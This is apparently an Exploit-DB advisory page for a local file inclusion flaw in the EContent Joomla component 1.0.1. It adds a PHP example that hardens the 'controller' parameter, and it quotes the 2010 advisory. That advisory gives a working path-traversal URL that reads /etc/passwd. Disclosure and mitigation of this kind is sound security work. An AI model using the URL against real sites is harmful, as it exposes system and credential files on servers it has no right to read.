Vendor: EContent
By: Chip D3 Bi0s
CVSS: N/A
Type: Local File Inclusion
CWE: 98
Product Name: EContent
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:econtent:econtent:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component EContent Local File Inclusion

EContent Joomla Component version 1.0.1 contains a local file inclusion vulnerability: by manipulating the 'controller' parameter in a GET request, an attacker can include a local file, such as /etc/passwd, and view its contents.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file operation.
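
One way to apply this mitigation to a request parameter that selects a file to include, shown as an added example (not the component's code, which this page does not reproduce). The function name `resolve_controller`, the allowlist entries and the controllers directory layout are assumptions.

```php
<?php
// Added example: hypothetical hardened lookup for a 'controller' request
// parameter. Names, allowlist and directory layout are assumptions and are
// not taken from com_econtent.

const ALLOWED_CONTROLLERS = ['feed', 'item', 'category']; // assumed names

/**
 * Map a user-supplied controller name to a file inside $baseDir,
 * or return null when the name is not acceptable.
 */
function resolve_controller(string $name, string $baseDir): ?string
{
    // 1. Accept only a short lowercase identifier. This rejects "../",
    //    "/", "." and NUL bytes before any path is built.
    if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $name)) {
        return null;
    }
    // 2. Allowlist: only controllers the component is known to ship.
    if (!in_array($name, ALLOWED_CONTROLLERS, true)) {
        return null;
    }
    // 3. Defence in depth: canonicalise and confirm the resolved file is
    //    still inside the controllers directory (catches symlinks).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo directory and inputs, including a traversal string of
// the kind quoted in the advisory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'controllers_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
touch($dir . DIRECTORY_SEPARATOR . 'feed.php');

$samples = ['feed', 'unknown', "../../../../etc/passwd\0", 'Feed', ''];
foreach ($samples as $s) {
    $resolved = resolve_controller($s, $dir);
    printf("%-40s => %s\n", json_encode($s), $resolved ?? 'rejected');
}
```

Only `feed` resolves to a path in the demo directory. Every other sample is rejected before it reaches a file operation.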
Source

Exploit-DB raw data:

---------------------------------------------------------------------------------
Joomla Component EContent Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: EContent
version		: 1.0.1
Developer	: E-Content
website		: http://www.econtentsite.com/
License		: GPL            type  : Non-Commercial
Date Added	: 24 March 2010
Download	: http://www.econtentsite.com/



Description     :

If you are looking for a way to add new/fresh content to your Joomla website,
without having to write a new article every day, then E-Content Joomla
Component is the solution for you!

As we know, articles are very important for business, especially for Internet
Marketing Business. You need to continually write unique and quality articles
to keep the attention of visitors and search engines.

E-Content allows you to automatically collect RSS feed, HTML page content items
and have each item inserted as a Joomla article in the section and category
you define. The content of the article will vary based on the specific page you
select.


--------------
file error	: components/com_econtent/econtent.php

how to exploit

http://127.0.0.1/index.php?option=com_econtent&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++